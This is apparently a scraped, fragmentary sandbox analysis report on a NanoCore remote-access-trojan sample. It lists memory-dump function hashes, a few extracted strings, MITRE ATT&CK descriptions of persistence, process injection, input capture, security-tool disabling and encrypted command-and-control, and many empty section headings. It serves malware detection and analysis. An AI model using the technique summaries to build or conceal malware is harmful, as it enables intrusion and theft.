Instruction Fuzzy Hash: 0331F634908209DFDFA8DBA4C1446FDBBB2BB45300F1141AAD422EB264D7B58E49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 051B25DE, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b80cad2121904834722f22ed73aba3d8c528638ac4f73016c22dec43ced3a706
Instruction ID: d0dd89c53dfd3022203dfb3faf0dc80d53c6b88221315ee6e14d976e91a4fe25
Opcode Fuzzy Hash: b80cad2121904834722f22ed73aba3d8c528638ac4f73016c22dec43ced3a706
Instruction Fuzzy Hash: D431AB74A10246CFEB28DFA5C44469ABBF2FF84314F20C139C465AF259DBB4988ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 051B4190, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abfe8838f56d4d845c05e343b79306e52d771ec858499aa40813acae1d2f9697
Instruction ID: 1a0f632215f88d6ee27f02f75f26cb23b41f51669f234e99e62beb36b515f48e
Opcode Fuzzy Hash: abfe8838f56d4d845c05e343b79306e52d771ec858499aa40813acae1d2f9697
Instruction Fuzzy Hash: 4A119071A002058BEF28EBF8E4445FF7AA7AF94240B52817AC51797285DFF0984087A1

Uniqueness

Uniqueness Score: -1.00%

Function 051B21F8, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c06e19e584b646866d10b4163d70b0e8f983cf9deafbaa01f5df2228a488b05f
Instruction ID: db3e260e611da7a6db552990dd61725f83b5d3882e464e884d197ed7c3c48acb
Opcode Fuzzy Hash: c06e19e584b646866d10b4163d70b0e8f983cf9deafbaa01f5df2228a488b05f
Instruction Fuzzy Hash: B421EA34908209DBDF58DFA4C1446FDBBB2BB44304F1141AAD422EB264D7B59E48CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02B4087C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611338523.0000000002B40000.00000040.00000040.sdmp, Offset: 02B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa06d5c9e95e0bea212e69d76f6ba092a2d029f5c1b7f9b30471957242b25250
Instruction ID: 3b5f498a1b6422cfe1efe76d7aa03dd14f965e3b993a5a431c7b7b2005e6e332
Opcode Fuzzy Hash: fa06d5c9e95e0bea212e69d76f6ba092a2d029f5c1b7f9b30471957242b25250
Instruction Fuzzy Hash: F911E734204344EFD709EB14C980B26BB91EB99708F24CDDCEA494B642CB7BD413DA91

Uniqueness

Uniqueness Score: -1.00%

Function 051B238F, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f64e065ab82e422d4b0aa4d157e70a50fc9d4e34dc74631ae0e288da058ff4
Instruction ID: a363f1271063d4293e9377740d607a272b44411926716a35033e787bd7ae2352
Opcode Fuzzy Hash: 40f64e065ab82e422d4b0aa4d157e70a50fc9d4e34dc74631ae0e288da058ff4
Instruction Fuzzy Hash: 3F119A78814249CFEB28CFA4C541AEEBBB2FF08340F10416EC562AB640DBB9184ACF51

Uniqueness

Uniqueness Score: -1.00%

Function 051B11DF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b54ec4af9417dfc695dde4285279d6dd006c4dec19ded4f6eb041254c5759a30
Instruction ID: 89d2679efec0a2d77b9d41efb5f574ed009b2da9e5c9c504183576bf637af6a5
Opcode Fuzzy Hash: b54ec4af9417dfc695dde4285279d6dd006c4dec19ded4f6eb041254c5759a30
Instruction Fuzzy Hash: 2E118230308180DFCB19DB28D4649A97FF6AF86205B2A41FBD446CF272CBB54C09C752

Uniqueness

Uniqueness Score: -1.00%

Function 051B05B9, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0121f060ba6c76a4f5ee8900c22ff9fd7032bba7900c92e0bfd07350c19be811
Instruction ID: bb62dda7d6df68fc91e345eb9c2d2a039d082e4c4ca358b6a6d64f9b056f49ce
Opcode Fuzzy Hash: 0121f060ba6c76a4f5ee8900c22ff9fd7032bba7900c92e0bfd07350c19be811
Instruction Fuzzy Hash: FD01A2217042214BCB596B7D98203BF7A9B9FC6650759446ED106DF385CFB59C0283E6

Uniqueness

Uniqueness Score: -1.00%

Function 051B05C8, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d5d828f7d6cca1ed648d12ace949f5c466516bf0a837d22cb88a7d88ff63f82
Instruction ID: 1e6584026766dfd801ea89e21e9c9f788835135ad2b6ca7029cbfe54607f43e7
Opcode Fuzzy Hash: 0d5d828f7d6cca1ed648d12ace949f5c466516bf0a837d22cb88a7d88ff63f82
Instruction Fuzzy Hash: 1BF0BE717001214BCA4C7A7E98117BF66CBABC8A517A9412EE206EF384CFB48C0343E6

Uniqueness

Uniqueness Score: -1.00%

Function 02B405D3, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611338523.0000000002B40000.00000040.00000040.sdmp, Offset: 02B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f4695072a0c8fbcea970aa20aade9def1addd1d9d20bda18e99f6e0cde92b45
Instruction ID: ffa9f92dc4260dc39eac93cb86d3bc6d0c70d5477722fd056bd212e7ecdc56f3
Opcode Fuzzy Hash: 2f4695072a0c8fbcea970aa20aade9def1addd1d9d20bda18e99f6e0cde92b45
Instruction Fuzzy Hash: CB01D6B25097806FD7128B06EC40863FFB8EF86660708C49FED498B611D225B904CB72

Uniqueness

Uniqueness Score: -1.00%

Function 051B1218, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deadc2b7a9902fb7ca3dd92ad951810af1bf48a754f9745d2d9aaae8f64796c4
Instruction ID: 09e65e5c7822d664cfe22fd893bc7c793269fd178e281767ae643aa428f75cea
Opcode Fuzzy Hash: deadc2b7a9902fb7ca3dd92ad951810af1bf48a754f9745d2d9aaae8f64796c4
Instruction Fuzzy Hash: BC011D30344010DBDA18DB2CD0689A97BEBBFC5610B2641FAE546CB765CFB59C09C781

Uniqueness

Uniqueness Score: -1.00%

Function 02B4087B, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611338523.0000000002B40000.00000040.00000040.sdmp, Offset: 02B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5302c3d435ef84ccac05806fcec197ec31fd6adee51e74cfe088cf322a9c00
Instruction ID: b1ba26d1ec4ef141b2ce55a821db06381719142992385affb20887ef85a6be52
Opcode Fuzzy Hash: 6f5302c3d435ef84ccac05806fcec197ec31fd6adee51e74cfe088cf322a9c00
Instruction Fuzzy Hash: 23015E35204284DFD719DF14D980B15BBA2FB89718F28CAEDEA491B652C737D813DB41

Uniqueness

Uniqueness Score: -1.00%

Function 051B0908, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d7a7e9e09bc4da31d03b4ac1390a9a20e00e7bbd42e792678f460387decf3e
Instruction ID: a34f7869cbf3acd94d706a0be23856d2dcd010994fe5cac4d95bf17a5d4c5c28
Opcode Fuzzy Hash: 48d7a7e9e09bc4da31d03b4ac1390a9a20e00e7bbd42e792678f460387decf3e
Instruction Fuzzy Hash: A3F0B4309153108FEB789AF488185AF7BB6AF8A350B030467D80797244DBB45C518792

Uniqueness

Uniqueness Score: -1.00%

Function 051B0918, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bf79322a4a9fe78ca55de64a6d9760eb0921834fbf9f2b2db19e6548aefc09
Instruction ID: 66950f636a82ab08fc2d6ef208fbf26a8e45120a0015d01e02451a3a86cf5467
Opcode Fuzzy Hash: 08bf79322a4a9fe78ca55de64a6d9760eb0921834fbf9f2b2db19e6548aefc09
Instruction Fuzzy Hash: 08E0EC31E152149AB73499F498085EFB7AAD7CD650F024437DA0B93240DBF04C4142D1

Uniqueness

Uniqueness Score: -1.00%

Function 02B40938, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611338523.0000000002B40000.00000040.00000040.sdmp, Offset: 02B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction ID: 7b86434085c9abdec110b84ef53fba92d5c4b58a018131ad37714ff8c0e2b36f
Opcode Fuzzy Hash: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction Fuzzy Hash: 11F01D35104644DFC305DF04D980B15FBA2EB89718F24CAADEA490B752C737E813DA81

Uniqueness

Uniqueness Score: -1.00%

Function 02B405F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611338523.0000000002B40000.00000040.00000040.sdmp, Offset: 02B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3338e98a2d15682507f36452678ecb13b74f0b1b0a7644d9ca951653df4ead4
Instruction ID: 65b9bd47465c48df77e6ac8b7222a46d37d2141255271a660749452630112619
Opcode Fuzzy Hash: e3338e98a2d15682507f36452678ecb13b74f0b1b0a7644d9ca951653df4ead4
Instruction Fuzzy Hash: BCE09276A046008BD650CF0BFC41452F798EB84630B08C47FDC0D8B700E636F505CEA6

Uniqueness

Uniqueness Score: -1.00%

Function 051B02A0, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e12e093236a93893157c674f7f7d3cd9786fb288bd09c82c4ab62f0e35576fca
Instruction ID: 03b2f6f13b08c8384ec2a351a0dc2fffd49a72bab08abfb76460219336ac69a2
Opcode Fuzzy Hash: e12e093236a93893157c674f7f7d3cd9786fb288bd09c82c4ab62f0e35576fca
Instruction Fuzzy Hash: 27E08C32009B00CFC769CBA4D85A8867BF1BF86710385C98ED0A28B565C762BC45CB02

Uniqueness

Uniqueness Score: -1.00%

Function 051B0170, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f11b11fb4d2d68fec8f824ea6e66f9ed8e3fc219e97108a1c29f0f730624af0
Instruction ID: 0b1a23d491ffd090ae3dd26861c4f080f8c2949c2fb18ab4512d3c3f78c87607
Opcode Fuzzy Hash: 3f11b11fb4d2d68fec8f824ea6e66f9ed8e3fc219e97108a1c29f0f730624af0
Instruction Fuzzy Hash: 23E046321183048FC71A5FF0D4184197BB6AE4A30875408AAC8628F266DB3AE882CB10

Uniqueness

Uniqueness Score: -1.00%

Function 051B2D20, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5962db04780e69a2470fde8268469db7947b957872c9631f57560bdf52174a1b
Instruction ID: 84cfa678ec9561ec6b60bcdadff29d288aa522f80e1c72b44a0fa10b261ea585
Opcode Fuzzy Hash: 5962db04780e69a2470fde8268469db7947b957872c9631f57560bdf52174a1b
Instruction Fuzzy Hash: F9E0C23C05D3809FE37A86A48811BF03F719B0B300F0A05A7D06A8D062C2A656088702

Uniqueness

Uniqueness Score: -1.00%

Function 051B064F, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f99bf1340fb2e5a8ba99338c251a0f32c46696c999a9d8a7c7117a4579a759c
Instruction ID: e7feb70289aa3f216a086324fd7f9cbd4e29670a96d1fb72db287f3e09601e68
Opcode Fuzzy Hash: 9f99bf1340fb2e5a8ba99338c251a0f32c46696c999a9d8a7c7117a4579a759c
Instruction Fuzzy Hash: 66D02E328853009FC36A8AB098090E5BBA1DAA732170184B7C80082820D2B64AA3CB41

Uniqueness

Uniqueness Score: -1.00%

Function 011D23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.610637733.00000000011D2000.00000040.00000001.sdmp, Offset: 011D2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2ed7910dc8046f3f9e80e697c27a4bca10a550728d626f12b5a0a872bafb83a
Instruction ID: fe1e1e14338737d1a82447e67f32ede8ea94776283e499f01eefb44800f15553
Opcode Fuzzy Hash: d2ed7910dc8046f3f9e80e697c27a4bca10a550728d626f12b5a0a872bafb83a
Instruction Fuzzy Hash: 73D05E79305A818FE32B8A1CC1A4F953BE4AB51B04F5644FDEC008B6A3C378D981D200

Uniqueness

Uniqueness Score: -1.00%

Function 011D23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.610637733.00000000011D2000.00000040.00000001.sdmp, Offset: 011D2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c15434c34ac629e7f2676a2a1509c4fce97f8919fd3e7b5ce9b57daf76abf67b
Instruction ID: ca1c2d7d91b740ad6485fb01e6d04097b43d30f9303d05bf0e9b5c77b1cc8137
Opcode Fuzzy Hash: c15434c34ac629e7f2676a2a1509c4fce97f8919fd3e7b5ce9b57daf76abf67b
Instruction Fuzzy Hash: 30D05E342041818BE719DB0CC694F593BD4AB85B04F0645E8AD108B662C7B4D881C600

Uniqueness

Uniqueness Score: -1.00%

Function 051B0180, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3b0478eff2a407216f269089864f4769b8f1425406c54376b76c46a39e1317
Instruction ID: 85ef83a59a448b82af15620cd4d5bfaaae2c2797b0e7f2d32967e124119ac150
Opcode Fuzzy Hash: 9f3b0478eff2a407216f269089864f4769b8f1425406c54376b76c46a39e1317
Instruction Fuzzy Hash: 78D01230200304CFCB1C2BF0E01842C33A6AF48305740087CD8168B744DF3AD881CB04

Uniqueness

Uniqueness Score: -1.00%

Function 051B0660, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79c66f530f79c54467180ee66a9a44d93474f0eb4a30beb56b0d9ace52de3f7d
Instruction ID: 7d8c56760472760267a761bfba17eab6c5ec802c457f5a325e6becd16c8fcf83
Opcode Fuzzy Hash: 79c66f530f79c54467180ee66a9a44d93474f0eb4a30beb56b0d9ace52de3f7d
Instruction Fuzzy Hash: AAC02B30045304CEE23CA7F26C0C4BB720B96C5302301C431D901000208FB2D4B1CA51

Uniqueness

Uniqueness Score: -1.00%

Function 051B2EC0, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfea8df341c9c0e73f55b23ec7fe10dec5430d1cc8f1a5a741f25a9fdbe529cf
Instruction ID: 68fe776a06c90e290ce949dd7f78f2deb075d5f960f152d2d3bf29c2c095a823
Opcode Fuzzy Hash: bfea8df341c9c0e73f55b23ec7fe10dec5430d1cc8f1a5a741f25a9fdbe529cf
Instruction Fuzzy Hash: D2B0123020420C0B276057F62808EA273CC55404593400074E82CC8000F651D0D02240

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 051B0D93, Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

0jr, xrefs: 051B0F8E
X1kr, xrefs: 051B0F1C
:@Dr, xrefs: 051B10CB
,:kr, xrefs: 051B0E38

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID: ,:kr$0jr$:@Dr$X1kr
API String ID: 0-1245831938
Opcode ID: 5098566c856520d02025bb38eb14c1f33e375437efc6f98b4dfda0dc9c61189c
Instruction ID: e79ee62007e4c84df8144bba5eb8a432ad48c59bdfbe30356f4e14fc8d1b9211
Opcode Fuzzy Hash: 5098566c856520d02025bb38eb14c1f33e375437efc6f98b4dfda0dc9c61189c
Instruction Fuzzy Hash: 0AB19670A08344CFD394DF78D260B6ABBE2FF94704F60596EE5898B395DF7598428B02

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report wIQLBHYbqz

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Function 00410B30, Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300
windowsleeptimeCOMMON

Function 0048CDAC, Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637
windowkeyboardCOMMON

Function 0048804A, Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571
windowCOMMONCrypto

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
